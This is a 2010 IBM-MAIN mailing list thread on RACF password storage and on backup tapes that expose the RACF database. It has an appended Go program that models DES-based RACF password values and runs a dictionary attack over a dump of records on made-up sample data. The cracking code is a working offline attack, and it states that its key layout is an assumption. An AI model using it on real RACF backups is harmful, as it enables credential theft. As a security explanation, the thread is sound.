Easy to say "do not share your RACF db"; harder in reality. Most sites
believe they are safe because their RACF db is security protected and the
dasd is not shared. And then completely forget that backups (to physical or
virtual tape) contain the exact same information. And quite often the DSN
used for the backup tapes is some type of dasd-manager HLQ, since it was
most likely a full-volume backup that happened to contain the RACF db. And
even if the HLQ for the full-volume backups is read-protected, it is still
far easier to hack a tape dataset. Often, tape libraries (physical and
virtual) are shared with less-secure test machines and quite often even with
non z/OS systems. Granted, you will need the physical layout of the RACF db;
but not the entire layout. Just enough to identify where the passphrases are
maintained.

The number of sites that forget about tape security is scary. And
unprotected tape (both physical and virtual) allows anyone in the
organization to read a backup of almost any file in the data center.

Russell Witt
my own 2-cents worth

-----Original Message-----
From: IBM Mainframe Discussion List [mailto:[email protected]]on
Behalf Of R.S.
Sent: Sunday, November 28, 2010 1:52 AM
To: [email protected]
Subject: Re: A New Threat for password hacking


Ed Gould writes:
> http://preview.tinyurl.com/2djttta
> Hacker Cracks Secure Hashing Algorithm Using Amazon Cloud
> Using EC2's cluster GPU power, security researcher spent only $2.10 to
> decrypt 14 SHA1 passwords in under an hour; other experts aren't concerned.

Fortunately the mainframe has no GPU <vbg>
More seriously:
1. Passwords in the RACF db are stored using DES, not SHA (actually the
password is the key used to encrypt the userid).
2. It's widely known that SHA1 is not strong enough.
3. The best idea is not to share the RACF db with potential hackers. No db
means nothing to crack; it doesn't matter which algorithm is used or how
much CPU power is available for cracking.

--
Radoslaw Skorupka
Lodz, Poland


--
BRE Bank SA
ul. Senatorska 18
00-950 Warszawa
www.brebank.pl

District Court for the Capital City of Warsaw,
XII Commercial Division of the National Court Register,
company register number KRS 0000025237
NIP: 526-021-50-88
As of 16.07.2010 the share capital of BRE Bank SA (fully paid up)
amounts to 168,248,328 zloty.

----------------------------------------------------------------------
For IBM-MAIN subscribe / signoff / archive access instructions,
send email to [email protected] with the message: GET IBM-MAIN INFO
Search the archives at http://bama.ua.edu/archives/ibm-main.html
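The following is an added example, not code from the thread, from IBM or from RACF. It models the scheme R.S. describes in point 1 (the password is the DES key, the userid is the plaintext, the 8-byte ciphertext is what gets stored) and shows what Russell's point about backup tapes means in practice: once the stored values are readable, verifying a guess costs one DES block encryption, and a wordlist run over a whole dump is cheap. Assumptions: fold8 (upper-case, truncate or blank-pad to 8 bytes) stands in for whatever RACF actually does to derive the key and lay out the userid; SampleDump is constructed here, not taken from any real database; all function and type names are mine.

```go
package main

import (
	"bytes"
	"crypto/des"
	"fmt"
	"strings"
)

// fold8 upper-cases a string, truncates it to 8 bytes and blank-pads it.
// ASSUMPTION: a stand-in for the real key folding / EBCDIC layout, which
// this example does not reproduce.
func fold8(s string) []byte {
	b := []byte(strings.ToUpper(s))
	if len(b) > 8 {
		b = b[:8]
	}
	for len(b) < 8 {
		b = append(b, ' ')
	}
	return b
}

// StoredValue returns DES_password(userid): the password is the key and
// the userid is the plaintext, as described in the thread.
func StoredValue(userid, password string) ([]byte, error) {
	block, err := des.NewCipher(fold8(password)) // Go ignores DES parity bits
	if err != nil {
		return nil, err
	}
	out := make([]byte, des.BlockSize)
	block.Encrypt(out, fold8(userid))
	return out, nil
}

// Record is one profile as an attacker would read it out of a backup.
type Record struct {
	Userid string
	Stored []byte
}

// Crack tries each candidate against one record. Each guess is a single
// DES encryption; the userid acts as the only per-user variation, so a
// precomputed table would have to be built per userid, but the per-guess
// cost stays trivial.
func Crack(r Record, candidates []string) (string, bool) {
	for _, c := range candidates {
		v, err := StoredValue(r.Userid, c)
		if err == nil && bytes.Equal(v, r.Stored) {
			return strings.ToUpper(c), true
		}
	}
	return "", false
}

// CrackDump runs the wordlist over every record and returns what fell.
func CrackDump(dump []Record, candidates []string) map[string]string {
	found := map[string]string{}
	for _, r := range dump {
		if pw, ok := Crack(r, candidates); ok {
			found[r.Userid] = pw
		}
	}
	return found
}

// SampleDump is a constructed stand-in for records lifted off a backup
// tape; the userids and passwords are made up so the example runs offline.
func SampleDump() []Record {
	var dump []Record
	for _, p := range [][2]string{{"IBMUSER", "sys1"}, {"OPER1", "winter10"}, {"AUDIT", "x9#qLm2v"}} {
		v, _ := StoredValue(p[0], p[1])
		dump = append(dump, Record{Userid: p[0], Stored: v})
	}
	return dump
}

func main() {
	wordlist := []string{"password", "sys1", "ibmuser", "winter10", "summer10"}
	for u, p := range CrackDump(SampleDump(), wordlist) {
		fmt.Printf("%-8s %s\n", u, p)
	}
}
```

Two of the three constructed records fall to a five-word list; the one with a non-dictionary password does not, which is the only defence left once the db is off-site. The example treats both user and password as upper-case 8-byte fields, so "sys1" and "SYS1" produce the same stored value; whether that matches a given site depends on its password settings.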
